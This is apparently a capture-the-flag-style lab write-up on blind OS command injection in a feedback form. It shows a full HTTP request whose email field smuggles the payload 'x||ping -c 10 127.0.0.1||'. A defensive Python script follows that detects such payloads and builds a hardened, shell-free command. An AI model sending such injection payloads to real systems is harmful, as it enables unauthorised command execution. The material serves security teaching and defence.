Blind OS command injection with time delays
Description
This lab contains a blind OS command injection vulnerability in the feedback function. The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.
Reproduction and proof of concept
Use Burp Suite to intercept and modify the request that submits feedback.
Modify the email parameter, changing it to:
email=x||ping+-c+10+127.0.0.1||
POST /feedback/submit HTTP/1.1
Host: 0ab00001046ddc1bc07b1d4b00f600f4.web-security-academy.net
Cookie: session=PBI3JYi8xuN2EDvHhrWZseFHddKXZkn3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
Origin: https://0ab00001046ddc1bc07b1d4b00f600f4.web-security-academy.net
Referer: https://0ab00001046ddc1bc07b1d4b00f600f4.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

csrf=WyBp0kTPSNblM4Z6OFjvREdg9Eo7FyIf&name=Test&email=x||ping+-c+10+127.0.0.1||&subject=Love+it&message=Much+appreciated.
Observe that the response takes 10 seconds to return.
Exploitability
An attacker will need to exploit the blind OS command injection vulnerability to cause a 10-second delay.
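As an added example, not part of the lab or of the writeup above, the following Python script takes the form body from the request shown and works through the defender's side of the issue: it decodes the body, shows the vulnerable string-concatenation pattern the lab represents (the mail command and its arguments are an assumption; the lab's real command is not shown), flags the field that carries a shell metacharacter or a time-delay primitive such as ping -c N, and builds the hardened equivalent that validates the value against an allow-list and passes an argument list to the OS without a shell. All function names and regular expressions are this example's own.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Constructed sample: the form body from the request in the writeup above.
SAMPLE_BODY = (
    "csrf=WyBp0kTPSNblM4Z6OFjvREdg9Eo7FyIf&name=Test"
    "&email=x||ping+-c+10+127.0.0.1||&subject=Love+it&message=Much+appreciated."
)

# Characters a POSIX shell treats as separators, substitutions or redirects.
SHELL_META = re.compile(r"[;&|`$()<>\n\r]")
# Delay primitives typical of time-based blind injection probes.
DELAY_PROBE = re.compile(r"\b(ping\s+-c\s+\d+|sleep\s+\d+|timeout\s+\d+)\b", re.I)
# Conservative allow-list for an e-mail address: no shell metacharacters can pass it.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")


def parse_feedback(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def build_vulnerable_command(email: str) -> str:
    """The pattern the lab exploits: user data concatenated into a shell string.
    Hypothetical command (assumption); the string is returned, never executed."""
    return f"mail -s 'New feedback' {email}"


def flag_injection(fields: dict) -> dict:
    """Detection: map field name -> reason for every field carrying a delay
    primitive or a shell metacharacter (delay probe reported first)."""
    findings = {}
    for name, value in fields.items():
        if DELAY_PROBE.search(value):
            findings[name] = "time-delay probe"
        elif SHELL_META.search(value):
            findings[name] = "shell metacharacter"
    return findings


def build_safe_command(email: str) -> list:
    """Mitigation: reject anything outside the allow-list, then return an argv
    list. With shell=False each element is one literal argument, so '||' in a
    value is plain text to the mail program, not an operator."""
    if not EMAIL_RE.match(email):
        raise ValueError("email rejected by allow-list")
    return ["mail", "-s", "New feedback", email]


def send_mail(argv: list) -> None:
    """Run the hardened command without a shell; kept separate so the rest of
    the module can be exercised on a host without a 'mail' binary."""
    subprocess.run(argv, shell=False, check=True, timeout=5)


if __name__ == "__main__":
    fields = parse_feedback(SAMPLE_BODY)
    print("vulnerable string:", build_vulnerable_command(fields["email"]))
    print("findings:", flag_injection(fields))
    try:
        build_safe_command(fields["email"])
    except ValueError as exc:
        print("hardened handler:", exc)
    print("hardened argv for a valid address:", build_safe_command("user@example.com"))
```

The detection regexes are a starting point for log review of request bodies, not a substitute for the fix: the only robust mitigation is the argv-list call plus allow-list validation, because a blocklist of metacharacters will always lag behind the shell's syntax.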